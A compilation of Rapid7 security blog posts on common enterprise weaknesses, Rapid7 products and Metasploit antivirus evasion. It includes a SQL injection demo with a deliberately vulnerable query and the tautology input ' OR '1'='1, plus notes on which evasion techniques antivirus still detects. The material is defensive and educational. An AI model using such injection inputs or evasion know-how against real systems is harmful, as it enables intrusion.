Rapid7 Blog


The Twelve Pains of Infosec


One of my favorite Christmas carols is the 12 Days of Christmas. Back in the 90's, a satire of the song came out in the form of the 12 Pains of Christmas, which had me rolling on the floor in laughter, and still does. Now that I am in information security, I decided it is time for a new satire, maybe this will start a new tradition, and so I am presenting, the 12 Pains of Infosec.

The first thing in infosec that's such a pain to me is
your password policy

The second thing in infosec that's such a pain to me is
default credentials, and your password policy

The third thing in infosec that's such a pain to me is
falling for phishing, default credentials, and your password policy

The fourth thing in infosec that's such a pain to me is
patch management, falling for phishing, default credentials, and your password policy

The fifth thing in infosec that's such a pain to me is
Windows XP, patch management, falling for phishing, default credentials, and your password policy

The sixth thing in infosec that's such a pain to me is
lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy

The seventh thing in infosec that's such a pain to me is
no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy

The eighth thing in infosec that's such a pain to me is
users as local admins, no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy

The ninth thing in infosec that's such a pain to me is
lack of management support, users as local admins, no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy

The tenth thing in infosec that's such a pain to me is
testing for compliance, lack of management support, users as local admins, no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy

The eleventh thing in infosec that's such a pain to me is
no asset management, testing for compliance, lack of management support, users as local admins, no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy

The twelfth thing in infosec that's such a pain to me is
trust in antivirus, no asset management, testing for compliance, lack of management support, users as local admins, no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy

The first thing in infosec that's such a pain to me is your password policy

When I go into organizations for penetration tests, one of the easiest ways to get in is through password guessing. Most organizations use a password policy of 8 characters, complexity turned on, and a change every 90 days. So, what do the users do? They come up with a simple-to-remember password that will never repeat. Yes, I am talking about the infamous Winter16 or variations of season and year. If they aren't using that password, then chances are it is something just as simple. Instead, set a longer password requirement (12 characters or more) and blacklist common words, such as password, seasons, months, and the company name.

The second thing in infosec that's such a pain to me is default credentials

The next most common finding I see is the failure to change default credentials. It is such a simple mistake, but one that can cost your organization a ton! This doesn't just go for web apps like JBoss and Tomcat, but also for embedded devices. Printers and other embedded devices are a great target since their default credentials are rarely changed. They often hold credentials to other systems (for example the LDAP or scan-to-share accounts configured on a printer) that help gain further access, or they can simply be used as a pivot point to attack other systems.
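For the password-policy pain above, here is how the longer-length rule and the deny-list can be enforced in a few lines. This is an added example written for this page, not code from the original post: the organization names and word lists are constructed placeholders, the 12-character minimum is the figure the post recommends, and the season-plus-year pattern is the Winter16 habit described above.

```python
import re

# Constructed deny-list for this example. A real deployment would load a much
# larger list (breached-password corpora, product names, site names, ...).
COMPANY_NAMES = ("acme", "acmecorp")          # hypothetical organization names
SEASONS = ("spring", "summer", "autumn", "fall", "winter")
MONTHS = ("january", "february", "march", "april", "may", "june", "july",
          "august", "september", "october", "november", "december")
COMMON_WORDS = ("password", "welcome", "letmein", "qwerty", "admin")

# Undo the usual substitutions (P@ssw0rd -> password) before matching words.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s"})

# Season or month (full or three-letter) followed by a two- or four-digit year:
# Winter16, Summer2017, Dec2016. Applied to the plain lowercase password so the
# digits of the year survive (LEET would turn 2016 into 2oi6).
SEASON_YEAR = re.compile(
    r"(?:spring|summer|autumn|fall|winter|"
    r"january|jan|february|feb|march|mar|april|apr|may|june|jun|july|jul|"
    r"august|aug|september|sep|october|oct|november|nov|december|dec)"
    r"[^a-z0-9]?(?:19|20)?\d{2}(?!\d)")


def letter_runs(s):
    """Maximal runs of letters: 'winter16!' -> ['winter']."""
    return re.findall(r"[a-z]+", s)


def check_password(pw, min_length=12, company_names=COMPANY_NAMES):
    """Return the list of policy violations; an empty list means the password passes."""
    problems = []
    if len(pw) < min_length:
        problems.append(f"shorter than {min_length} characters")

    lower = pw.lower()
    norm = lower.translate(LEET)
    runs = set(letter_runs(lower)) | set(letter_runs(norm))
    for word in SEASONS + MONTHS + COMMON_WORDS + tuple(company_names):
        # Words of four letters or fewer (may, fall, june, acme) only count as a
        # whole run, so "mayhem" or "waterfall" is not rejected; longer words
        # are rejected wherever they appear.
        hit = word in runs if len(word) <= 4 else (word in lower or word in norm)
        if hit:
            problems.append(f"contains blacklisted word '{word}'")

    if SEASON_YEAR.search(lower):
        problems.append("season or month followed by a year (e.g. Winter16)")
    return problems


def is_acceptable(pw, **kw):
    return not check_password(pw, **kw)


if __name__ == "__main__":
    for candidate in ("Winter16!", "P@ssw0rd2016", "Acme!Rocks2016",
                      "correct horse battery staple"):
        print(f"{candidate!r}: {check_password(candidate) or 'OK'}")
```

The point of returning every violation rather than a bare yes/no is that the rejection message can tell the user why ("Winter16" fails three rules at once), which is what stops them from trying Winter17 next.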
The third thing in infosec that's such a pain to me is falling for phishing

Malicious actors go for the weakest link. Often this is the users. A carefully crafted phishing email almost always gets clicks; in fact, many security professionals fall victim to phishing emails too. So, what can we do about it? We must train our employees regularly to spot phishing attempts, and encourage and reward them for reporting attempts to security. Once reported, add the malicious URL to your blacklist and redirect it to a phishing education page. And for goodness' sake, Security Department, please disable the links and strip the HTML tags from the email before forwarding it as "education", or you will be the one delivering the live lure to the whole company.

The fourth thing in infosec that's such a pain to me is patch management

There are so many systems out there. It can be hard to patch them all, but having a good patch management process is essential. Ensuring our systems are up to date with the latest patches will help protect them from known attacks. It is not just operating system patches that need to be applied, but patches for any software you have installed; third-party applications such as browsers, Java, and Flash are frequent targets.

The fifth thing in infosec that's such a pain to me is Windows XP

Oh Windows XP, how I love and hate thee. Even though Windows XP support went the way of the dodo back in April 2014, over 2.5 years later I still see it being used in corporate environments. While I called out Windows XP, it is not uncommon to see Windows 2000, Windows Server 2003, and other unsupported operating systems. While some of the issues with these operating systems have been mitigated, such as MS08-067, many places have not applied the patches or taken the mitigation steps. That is not to mention the unknown vulnerabilities that exist and will never be patched. Your best bet is to upgrade to a supported operating system. If you cannot for some reason (required software will not run on newer operating systems), segregate the network to prevent access to the unsupported systems.

The sixth thing in infosec that's such a pain to me is lack of input filtering

We all know and love the OWASP Top 10. Three of the Top 10 fall under this pain. Cross-Site Scripting (XSS), SQL Injection (SQLi), HTML injection, command injection, and open redirects are all vulnerabilities that can be solved fully, or at least partially in the case of XSS, with input filtering. Web applications that perform input filtering should allow only known-good characters rather than trying to strip bad ones, and should perform the filtering on the server side, not in the client, where it can be bypassed trivially. Input filtering is one layer, not the whole fix: SQLi is properly closed with parameterized queries, and XSS is remediated with output encoding at the point where data is written into the page.

The seventh thing in infosec that's such a pain to me is no monitoring

In 1974, Muhammad Ali said "His hands can't hit what his eyes can't see," referring to his upcoming fight with George Foreman. This quote holds true in infosec as well. You cannot defend what you cannot see. If you are not monitoring your network, and centralizing the logs so you can correlate them, you will miss attacks. As Dr. Eric Cole says, "Prevention is ideal, but detection is critical." It is also critical to REVIEW the logs, meaning you will need good people who know what they are looking for, not just good monitoring software.

The eighth thing in infosec that's such a pain to me is users as local admins

For years we have been recommending that user privileges be segregated, yet on almost every penetration test I perform I find this to be an issue. Limiting accounts to only what is needed to do the job is very hard, but essential to securing your environment. This means not giving local administrator privileges to all users, but also using separate accounts for managing the domain, limiting the number of privileged accounts, and monitoring the use of these accounts and their group memberships.
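To make the input-filtering pain concrete, here is the vulnerable pattern next to its hardened form: SQL built by string concatenation beside a parameterized query, a server-side allow-list for the input, and HTML output encoding for the XSS case. This is an added example for this page, not code from the original post; the users table is constructed in memory and the usernames are invented.

```python
import html
import re
import sqlite3


def make_db():
    """Constructed in-memory users table for the example (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, display_name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "Alice", "admin"),
        ("bob", "Bob", "user"),
    ])
    return conn


# --- SQL injection ---------------------------------------------------------

def find_user_vulnerable(conn, username):
    """Builds the statement by concatenation: the input becomes part of the SQL.
    username = "' OR '1'='1" turns the WHERE clause into a tautology and dumps
    every row. This is the bug, kept here for contrast; never use it."""
    query = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, username):
    """Parameterized query: the driver sends the value separately, so it can
    never be parsed as SQL. This is the primary fix for SQLi."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


# --- Server-side input validation (allow-list, not a bad-character strip) ---

USERNAME_RE = re.compile(r"[a-z][a-z0-9_]{2,31}")


def valid_username(s):
    """Accept only what a username may contain; reject everything else. Runs
    on the server: a client-side check is bypassed with one proxy edit."""
    return USERNAME_RE.fullmatch(s) is not None


def find_user(conn, username):
    """Validation and parameterization together (defense in depth)."""
    if not valid_username(username):
        raise ValueError("invalid username")
    return find_user_safe(conn, username)


# --- Cross-site scripting --------------------------------------------------

def render_greeting_vulnerable(display_name):
    """Writes untrusted data straight into HTML: reflected XSS."""
    return "<p>Hello, " + display_name + "</p>"


def render_greeting(display_name):
    """Output encoding at the point of insertion into HTML. Input filtering
    alone cannot do this job: the same string is harmless in a parameterized
    SQL query and dangerous in HTML, so the encoding must match the output
    context."""
    return "<p>Hello, " + html.escape(display_name, quote=True) + "</p>"
```

Run the two `find_user_*` functions with the tautology `' OR '1'='1` to see the difference: the concatenated version returns every row, the parameterized one returns nothing because no user is literally named that.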
The ninth thing in infosec that's such a pain to me is lack of management support

How often do I run into people who want to make a change or changes in their network, yet do not get the support they need from upper management? A LOT! Sometimes an eye-opening penetration test works wonders.

The tenth thing in infosec that's such a pain to me is testing for compliance

I get it, certain industries require specific guidelines to show adequate security is in place, but when you test only for compliance's sake, you are doing a disservice to your organization. When you attempt to limit the scope of the testing or firewall off systems during the test, you are pulling a blinder over your eyes, and cannot hope to secure your data. Instead, use the need for testing to meet compliance as a way to get more management support and enact real change in the organization.

The eleventh thing in infosec that's such a pain to me is no asset management

You can't protect what you don't know about. In this regard, employ an asset management system. Know what devices you have and where they are located. Know what software you have, and what patch levels they are at. I can't tell you how many times I have exploited a system and my customer says "What is that? I don't think that is ours", only to find out that it was their system; they just didn't have good asset management in place.

The twelfth thing in infosec that's such a pain to me is trust in antivirus

A few years ago, I read that antivirus software was only about 30% effective, leading to headlines about the death of antivirus, yet it is still around. Does that mean it is effective in stopping infections on your computer? No. I am often asked "What is the best antivirus I should get for my computer?" My answer is usually to grab a free antivirus like Microsoft Security Essentials, but be careful where you surf on the internet and what you click on. Antivirus will catch the known threats, so I believe it still has some merit, especially on home computers for relatives who do not know better, but the best protection is being careful. Turn on "click to play" for Flash and Java (if you can't remove Java). Be careful what you click on. Turn on an ad blocker. There is no single "silver bullet" in security that is going to save you. It is a layering of technologies and awareness that will.

I hope you enjoyed the song, and who knows, maybe someone will record a video singing it! (not me!) Whatever holiday you celebrate this season, have a great one. Here's to a more secure 2017 so I don't have to write a new song next year. Maybe "I'm dreaming of a secure IoT" would be appropriate.

Finding and Protecting mission-critical assets with ControlsInsight


ControlsInsight helps organizations measure how well critical security controls are deployed and configured throughout the enterprise. Yet, as hard as you may try, it's extremely difficult to protect every asset on your network perfectly, and it's often necessary to prioritize "mission-critical" assets that store important or sensitive business data. Clearly, securing the laptop of Sally, the chief financial officer, is much more important than securing Joe the intern's laptop, which probably holds more cat pictures than financial models.

The asset filtering feature in ControlsInsight, based on Rapid7 RealContext, is one way to track the status of controls for groups of assets that have been tagged as critical. But what about a scenario where you want to verify the configuration of controls for a particular asset? While the Assets tab lists all assets being assessed, if you know the IP address or host name of the asset you'd like to analyze, the search functionality in ControlsInsight will quickly get you the information you need.

Let's say we know that Sally's computer has the IP 10.0.0.38 on our network. Start by selecting the type of assets you'd like to analyze (we've selected Desktop assets in the example), and enter the IP address in the search box. After selecting the asset that represents Sally's desktop, we can see that she's still using Windows Vista Enterprise Edition (not seeing the assets you expect? check out our blog post on the subject).

Oh no! It looks like Sally is running a high-risk system. She's one of the last people we want running a high-risk system, so let's do something about it. While we might want to have a sit-down with Sally about her choice of operating system, our first order of business is to make sure Sally is as well-protected as possible while she goes about her work. Let's click on the asset to find out what we can do to help.

So it looks like there's lots of room for easy improvement of Sally's computing environment. Note that if rules like this are being tripped on one employee's computer, it's often symptomatic of not enough safeguards being in place company-wide, relating to things like antivirus operation, web browser updating, and default settings for fresh Windows installations. The Next Steps tab in ControlsInsight helps to prioritize corrective action at the enterprise level, but sometimes it's necessary to address a deficiency on a particular asset first. Let's look at the list from Sally's laptop again with a focus on some of the easy-to-correct controls.

System updates, antivirus, and web browser updates are some of the cornerstones of a good user defense. They're also areas that users are very familiar with, so they're a good place to start when securing users on your network. ControlsInsight provides you with a detailed breakdown of what exactly is wrong with the asset and the specifics of the checks that have failed. After expanding some of the controls, we've got a clear view of the problems that were found. Let's look at some of the remediation steps that could solve them.

Fixing antivirus

It looks like Sally has an antivirus program (in this case, Norton 360) installed, which is great news! It looks like it hasn't been updated in a while though. There are a few ways we can fix this:

Ensure local updating is turned on in the IT team's base Windows images/installations.
Talk to Sally about why she disabled her antivirus updating, and see what we can do or change to make it easier for her to leave it on (and update Sally's computer while we're there).

Hardening web browsers on your network

It looks like Sally's web browsers are a little less than perfect with regard to URL filtering and reputation scanning. As the web is one of the primary transmission vehicles for all sorts of malicious code, let's go over a few simple things that we can do to secure Sally's web experience.

A good practice to increase web security on your network is to pre-install or provide a "trusted" web browser version/build. This way, we can change the default state of web browsers on the network from vulnerable/default to less-vulnerable/customized, and reduce the support surface for IT from every-browser-version-ever to a few versions (that may change over time). While there is some IT overhead to supporting a "trusted" version (and making sure that it keeps up with updates to the browsers), it's often much more cost effective to spend properly on IT than to face a data breach.

Another good practice for hardening web browsers is to roll out a URL filtering strategy/default file along with turning on reputation scanning for your users, in the browsers your users use most often (whether that be Firefox, Safari, Opera, or any of the tens of browsers out there).

System updates

In addition to the antivirus and web browser issues, it looks like Sally's computer is running an older version of Windows Vista, which has UAC (User Account Control) disabled. While it is very difficult to corral all the high-risk applications a user might have running on the system, it's often worth investing in updating the platform the applications run on (in this case Vista) to provide protection across the board. Here are some steps IT could take to fix these controls:

Talk to Sally about whether she disabled UAC (and if so, why), update Sally's computer with a newer Service Pack, and enable User Account Control.
Update the Windows fresh-install images being used at the company to ensure that UAC is enabled and the newest Service Pack is always installed for users.

After fixing these issues on Sally's computer, we can enable her to get back to doing what she does best, securely and safely. Remember that security is as much a human issue as it is a technological one. Treat your end-users with courtesy and respect, and be empathetic to their needs, while protecting them from the big bad world out there.

Anything you've done in your company that you've found especially helpful in managing mission-critical assets? If so, tell us about it in the comments below!

UserInsight's New User Statistics Provide Great Visibility for Incident Responders


Nate Silver made statistics sexy, and we're riding that wave. But seriously, breaking down some of the noisier alerts on the network by user and showing you spikes can really help you detect and investigate unusual activity. That's why we've built a new UserInsight feature that shows you anti-virus alerts, vulnerabilities, firewall activity, IDS/IPS alerts, and authentications for the users with the most activity, and lets you dig in deeper by filtering by user. You can get to the new stats page by clicking on the Active Users link on your UserInsight dashboard. What you'll see is the stats for five different data types.

Virus Alerts: Most security professionals see anti-virus solutions as a protective solution for mass malware rather than a detection solution. However, we believe there is some value in this much-bashed data when you apply statistics to it and break it down by user. In our demo system, the user Shawna Roy popped up at the top of the list with 65 virus alerts. By clicking on the little graph icon next to the name on the right, you can display the data for this user only (and add additional users to the chart by clicking their icon). Shawna saw 30 alerts on August 14, which is probably worth investigating. By clicking on the name itself, you can get more context on Shawna's activities, such as the assets and cloud services she authenticated to, the applications she accessed, and the locations she logged on to the network from. This may show other indicators of compromise that can be helpful in triaging this statistical outlier.

Exploitable Vulnerabilities: Slicing vulnerability data by CVSS score, exploitability, and critical hosts is something security professionals are very familiar with. However, most security programs can't provide visibility by user, which can be important in the context of phishing and other social engineering campaigns that target client-side vulnerabilities. The more exploitable vulnerabilities a user has, the more attack surface cyber-criminals have to work with. The new UserInsight vulnerabilities user stat shows you which users have the most exploitable vulnerabilities and warrant a second look, to ensure that your security program is prioritizing the right vulnerabilities for remediation. It can also give context on the likelihood that an attack against a certain user successfully exploited their machine.

Firewall Activity: Firewall activity is very noisy, especially if you take all traffic rather than just denies. In the following example, Joshua Green had a million firewall connections in a single day, which is clearly an outlier when we filter for this user. This is definitely worth investigating, since it may be a sign of a malware/botnet infection that is scanning the Internet or participating in a DDoS attack.

IDS: IDS/IPS data is also extremely noisy. One customer we spoke to has 20,000 alerts per day, making it impossible for him to investigate every single one. Providing user context can greatly increase visibility and help make sense of the data. Check out Matt's blog post on canceling noisy alerts, which covers a lot of this topic already.

Authentications: Both successful and failed authentications can provide a lot of visibility into what's happening on your network. Accounts with many successful authentications can be legitimate or a cause for concern. There will be some obvious accounts, such as your vulnerability scanner or a backup solution that logs on to many devices many times, but there may also be accounts that should not exhibit this type of activity. You may discover that a user account is being abused as a service account, for example, which is not a best practice. Failed authentications may point you to a brute-force attack on a certain user, or show you an issue with a device using an outdated password.

Check out the new user stats page and let us know if you discover a use case that we're not listing here, or a new stat you'd find useful. The feature is already live in your UserInsight environment. If you don't have UserInsight yet, please sign up for a free guided demo and chat with us about a proof of concept in your environment to detect and investigate incidents.
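The per-user breakdown and spike detection described here (and the "no monitoring" pain in the 12 Pains post above, which comes down to the same thing: centralize the events, then actually look at them) can be reproduced on your own log data with a little statistics. This is an added example written for this page, not UserInsight code. The events are constructed (the names, dates and counts are invented to mirror the post's Shawna Roy outlier and a noisy scanner account), and the median/MAD threshold is an assumed rule, not the product's method.

```python
from collections import Counter
from statistics import median


def constructed_events():
    """Constructed sample events, not customer data: (day, event_type, user).
    Names, dates and counts are invented for the example."""
    days = ["2014-08-%02d" % d for d in range(10, 15)]
    events = []
    for day in days:
        for user in ("alice", "bob", "carol"):
            events += [(day, "virus_alert", user)]        # one AV alert per user-day
            events += [(day, "failed_auth", user)] * 2    # a couple of typos a day
            events += [(day, "auth", user)] * 5           # normal logon volume
        events += [(day, "auth", "svc_scanner")] * 500    # vulnerability scanner: noisy by design
    events += [("2014-08-14", "virus_alert", "shawna.roy")] * 30   # the outlier from the post
    events += [("2014-08-14", "failed_auth", "carol")] * 200       # password guessing against carol
    return events


def daily_counts(events):
    """Events per (type, user, day)."""
    return Counter((etype, user, day) for day, etype, user in events)


def top_users(events, etype, n=5):
    """The 'users with the most activity' list for one data type."""
    return Counter(user for _, t, user in events if t == etype).most_common(n)


def user_series(events, etype, user):
    """Per-day counts for a single user: the filtered chart view."""
    return sorted(Counter(day for day, t, u in events if t == etype and u == user).items())


def spikes(events, k=5, ignore=()):
    """User-days whose count exceeds median + k * MAD for that event type.
    Median/MAD rather than mean/stddev so one huge outlier cannot inflate the
    threshold and hide itself; a MAD of 0 is floored to 1 so a flat baseline
    still gives a usable cut-off. Assumed rule, not UserInsight's."""
    counts = daily_counts(events)
    by_type = {}
    for (etype, user, day), n in counts.items():
        by_type.setdefault(etype, []).append((user, day, n))
    flagged = []
    for etype, rows in by_type.items():
        values = [n for _, _, n in rows]
        med = median(values)
        mad = max(median(abs(v - med) for v in values), 1)
        for user, day, n in rows:
            if user not in ignore and n > med + k * mad:
                flagged.append((etype, user, day, n))
    return sorted(flagged)


def steady_heavy_hitters(events, etype, per_day=100):
    """Accounts above per_day on every day observed: scanners, backup jobs and
    the like. Review them once, then pass them to spikes(ignore=...)."""
    counts = daily_counts(events)
    days = sorted({d for d, _, _ in events})
    users = {u for _, t, u in events if t == etype}
    return sorted(u for u in users if all(counts[(etype, u, d)] >= per_day for d in days))


if __name__ == "__main__":
    ev = constructed_events()
    print("top virus-alert users:", top_users(ev, "virus_alert", 3))
    print("shawna.roy by day:", user_series(ev, "virus_alert", "shawna.roy"))
    noisy = steady_heavy_hitters(ev, "auth")
    print("steady heavy hitters (review, then ignore):", noisy)
    for row in spikes(ev, ignore=noisy):
        print("spike:", row)
```

Two things the run shows that the prose only states: without the ignore list the scanner account is flagged on every single day, which is exactly the noise the post warns about, and the brute-force attempt against one user stands out on the failed-authentication series even though that user is otherwise unremarkable.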

Is AV dead? Why Symantec's executive is only half right about the state of anti-virus software


This week, a Symantec executive proclaimed that anti-virus is dead. Given the company's position in the AV market, it may be the most discussed comment coming from Symantec for some time; though in and of itself, I'm not sure the statement would elicit much of an argument from most security professionals. Oh, except for the other AV vendors of course.

For our own part, it's not news that we believe that AV is "limited". In fact, Metasploit specifically offers AV evasion capabilities to represent the way that attackers behave. Anti-virus only works to protect you against threats that are known, and known in enough detail that they can be recognized and blocked on a variety of systems. It's not rocket science to think, then, that a technically skilled attacker with time will either tweak some existing malware or create something new, so that it won't be recognizable to standard AV packs. Hence all that cynicism about AV, particularly among the pen testing community, who face (and defeat) AV on a daily basis. But here's where I have a hard time playing the funeral dirge for AV.

Whether it's because you're lazy, or a total go-getter who wants to cram as much into your day as possible, either way you're likely to want to be as efficient with your time and effort as you can be. This is why people like automation (yes, that was a Metasploit Pro plug). This is also why there is a pretty decent market for crimeware packs. And why not? There is a lot of malware knocking about on the internet after 30 years or so of people creating it, and others creating flawed software to be exploited by it. And tragically much of it still works. So if I am an evil genius attacker (cybercriminals are all evil geniuses, no?) and I can get the goodies by using old malware that's been around for ages, why wouldn't I? Why spend time and energy on creating something more elaborate when the old stuff still works, and meanwhile I can divert my time to creating a car that turns into a submarine to reach my secret underwater lair. Or sitting around playing Titanfall in my underwear.

So yeah, I'm not ready to pronounce AV dead, and I still make sure my mom runs it on her computer because at least it affords her a level of basic protection against drive-by attacks. The Verizon Data Breach Investigations Report summarizes this with: "While many proclaim AV is dead, not having it is akin to living without an immune system." I'm not sure I think AV is as effective as an immune system. Rather, I'd compare it to a shower curtain: it protects you from the peripheral spray, but won't stand up to a direct deluge.

This is where I think AV can become problematic, dangerous even. It can give people a false sense of security. You need to remember that it doesn't make you bulletproof, not even close. So whether you're my mom or a Fortune 50 enterprise (and everything in between), you still need to practice good security hygiene and practices beyond deploying AV. Which is where pen testing comes in... (though probably not for my mom). Testing AV evasion techniques is the way to understand the impact of directing the faucet right at the edge of the tub; just how soggy is everything going to get, and what problems does that cause? To find out, why not try our updated AV evasion techniques, which help you mimic a real-world attack?

One final comment: if you are running AV, it's crucial that you keep it active and updated on all machines, or it really is a pointless exercise, like having a holey shower curtain, or one made of rice paper. This is something Rapid7 ControlsInsight can help you with. Now I'm off to my mom's place to update hers and work on my sub-car-ine.

Anti-Virus Evasion Makes Vulnerability Validation More Accurate


When we talk about anti-virus evasion, we mostly do so in the context of a penetration test: if the "bad guys" can evade AV solutions because they write custom payloads, then a penetration tester must do the same to simulate an attack. However, AV evasion is also critical to vulnerability validation. While a full-scale penetration test looks for any way into the network, vulnerability validation surgically examines one vulnerability on a specific host and tests whether it is exploitable. Security professionals do vulnerability validation because it enables them to determine if a vulnerability is "real" so they can prioritize it; many also use the validation to demonstrate the security exposure to their peers in IT operations to get quick buy-in to patch or mitigate the risk. Metasploit Pro integrates with Rapid7 Nexpose Enterprise to pull reported vulnerabilities for validation and pushes both validated vulnerabilities and vulnerability exceptions back into Nexpose for reporting and future testing, a process we call "closed-loop" vulnerability management.

When you validate a vulnerability, you use the exploit associated with the vulnerability to test whether it can be used against the machine. The idea is not only to rule out false positives but also to test whether mitigating controls can stop an attack. For example, you may have closed a port on the host, shut down a service, or made adjustments on your firewall to protect the system from an attack. While anti-virus solutions are also considered security controls, they are mostly effective against mass malware, not targeted attacks by a skilled attacker. When validating a vulnerability, you should therefore use anti-virus evasion that mimics these attackers to get a realistic picture of whether a certain vulnerability leaves a system open to attack. If you don't, you may create an exception and accept the risk as mitigated while you're actually still vulnerable, giving you a false sense of security that could result in a breach.

In the recent 4.9 release of Metasploit Pro, we have improved our anti-virus evasion and baked it into all processes that use payloads, including vulnerability validation. That means that simply by using Metasploit Pro for vulnerability validation, you're already using anti-virus evasion to mimic a real-world attacker. AV evasion is not included in Metasploit Framework, Community or Express, so we recommend that you use Metasploit Pro for vulnerability validation to get clean, realistic results. In fact, the classic Metasploit Framework payloads get flagged by most AV products because they are readily available as open source, which means a payload blocked by AV is reported as "not exploitable": a false negative in your vulnerability validation program. If you don't have a copy of Metasploit Pro but would like to give it a go, simply sign up for the free Metasploit Pro trial from rapid7.com.

Won't Someone Think of The AV Vendors?


Got Too Many Shells?

Since the release of Metasploit 4.9, have you, the dedicated and resourceful penetration tester, been having this problem of being too successful at skipping past the defender's detection efforts? Are you getting too many shells? Maybe you're getting a little embarrassed for the IT guys who are wondering what the heck just happened to their anti-virus protections. If that's the case, I have some good news! As of today, April 1, 2014, Metasploit is pleased to announce an entirely new feature for penetration testers: Anti-Virus Attraction!

Anti-Virus Attraction

Turns out, we're just too darn evasive for many-to-most AV solutions. So, in order to level the playing field between the penetration testers and the AV vendors, Metasploit Framework has extended the payload encoders and the executable generators to be a little less evasive by including some easy-to-detect data in our payloads. Well, a lot less. After several high-level meetings and some deep-dive research in the field of malware detection, we've come up with a plan to address this too-successful problem. As of today, we now ship both the generic/eicar payload encoder (which works across all platforms) and the EXE::EICAR static executable generator (Windows-only).

Detection: Not Quite 100%

I'm pretty pleased with the results. Check out our VirusTotal hit rate: 49 out of 51 malware detection solutions successfully pick up EICAR. We're working on ensuring those last two are able to detect Metasploit as well; if you know anyone over there, you might drop them a line and ask how you can help.

Usage

The usage is straightforward. For example, any given payload can be encoded to EICAR-compliance with the generic/eicar encoder using the command line tool msfvenom. Note the size reduction, by the way: the encoded payload is merely 68 bytes, which is 227 bytes smaller. A 77% savings in payload size is nothing to sneeze at!

Generating a Windows EXE for any compatible Windows exploit is similarly easy: just set the EXE::EICAR or MSI::EICAR option to true, and you'll be using the new static executable generator instead of the souped-up dynamic one.

Note, while these payloads and binaries are quite real and quite functional, actually using them will certainly ruin any chance of getting a working shell, since the EICAR test file standard does not allow for any kind of useful extension for functional requirements like opening network sockets. Oh well, it's a sacrifice.

So, if you've been having such a good run that you just have too many shells, and you feel like you need to throw a bone to defenders, give the EICAR transforms a whirl. This new feature is available today in the Metasploit Framework as of Pull Request #3168, and will be coming soon in an update of Metasploit Pro and Community editions; in the meantime, download your free 7-day trial of Metasploit Pro today.

If you happen to be more interested in AV evasion (how lame!) than AV attraction (yay!), join AV black belt ninja Dave Maloney on his free webcast "Evading Anti-Virus Solutions with Dynamic Payloads in Metasploit Pro": Register for Americas time zone & on-demand. Register for European time zone.

ControlsInsight...Controls discussed.

Rapid7 ControlsInsight allows organizations to quickly assess the deployment and configuration of 11 critical security controls from one platform. We'd like to take a brief look at these controls to discuss what they are and what they mean to the organization (or, as one of my professors was known to bark out at the end of a less than compelling presentation, "So what?"). Previous blogs have looked at the unique password, browser up to date, and operating system up to date controls; in this installment we'll take a high level look at three more.

Antivirus optimized

What does it mean: This control ensures that an AV tool (ControlsInsight currently supports McAfee, Symantec, Sophos, Trend Micro, Microsoft, and Kaspersky) is installed, enabled, and that its signature definitions (the DAT file) are current.

Why it is important: Corporations roll out AV to nearly every machine when deploying to new employees or upgrading older machines. On the day you receive your new laptop you have the latest and greatest (or not…I've received "core-load" machines in the past that were out of date when delivered to me), but over time signatures need to be updated, or employees intentionally or unintentionally disable the AV, leaving the machine and the organization vulnerable. AV is mature and ubiquitous; while it is not perfect, neglecting to deploy and manage it leaves a critical opening via the files that enter your organization on a daily basis.

Code execution prevention

What does it mean: This control checks that the operating system's memory-protection mitigations are enabled, so that an exploit cannot simply execute code it has written into a data region of a process's memory. ControlsInsight monitors four specific mitigations: ASLR, SEHOP, EMET, and DEP.

Why it is important: Memory corruption exploits depend on running attacker-supplied bytes from the stack or heap and on knowing where code and data sit in memory. DEP marks data pages non-executable, ASLR randomizes where executables, libraries, stacks and heaps are loaded, SEHOP validates the structured exception handler chain before it is used, and EMET applies these and further mitigations to applications that do not opt in on their own. With them enabled, many exploits fail or crash the target process instead of running the attacker's payload. They do not replace patching, but they raise the cost of exploitation considerably, and a machine with them switched off is an easier target than the rest of the fleet.

Email attachment filtering enabled

What does it mean: This control actively prevents users from receiving certain file types that may be high risk to the organization, typically .exe files.

Why it is important: While file attachments are an integral part of email, the key is to allow those that are safe and part of the business activities (.XLS, .PPT, etc.) while blocking or severely limiting those that can introduce viruses or other risks (.EXE) into the organization.

As highlighted in last week's blog, each of these controls can be enabled or disabled within your organization to tailor ControlsInsight to you. Want to try it in your organization? Click here for a trial.

12 Days of HaXmas: A Cat and Mouse Game Between Exploits and Antivirus

This post is the twelfth, and last, in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013. In the final episode of 12 Days of HaXmas, we'll talk about the holy war between browser exploits and antivirus. It will sound a little biased from time to time, but note that it is not meant to compare who is better -- I don't have the resources to compare the entire matrix of AV solutions, only what's easily accessible by the average population. So, please don't read this like it's a full-blown, multi-million dollar research paper. It's just a blog. I can only discuss this from my own perspective - that is, me as an open source hacking tool provider, and my audience as the users - enjoy!

Antivirus evasion is always a cat and mouse game, there is no argument about that. Whatever you do as an attacker, the talented engineers and researchers on the defense side will eventually solve the problems. And then you come up with something new, and the fight goes on until one of us retires. Take Metasploit for example: we offer several features that can be used (or are used) to bypass AV, and this is what's currently happening:

Technique: Effectiveness
- Apache Template used by Windows meterpreter: Heavily flagged by most AV.
- msfencode: Decoding stub can be flagged by most AV.
- Encode more?: Popular AVs should still be able to flag it.
- Custom template + encode more??: Popular AVs should still be able to flag it.
- ObfuscateJS: Ineffective against some AVs.
- JSObfu: Ineffective against some AVs.
- Specific exploit writing style: Undetected for a few days, but good luck keeping it that way.
- Other commercial-level AV evasion technologies: Not covered in this blog.

Whatever evasion techniques you've made public, AV will most likely flag them. Does it look kind of depressing? Yes.
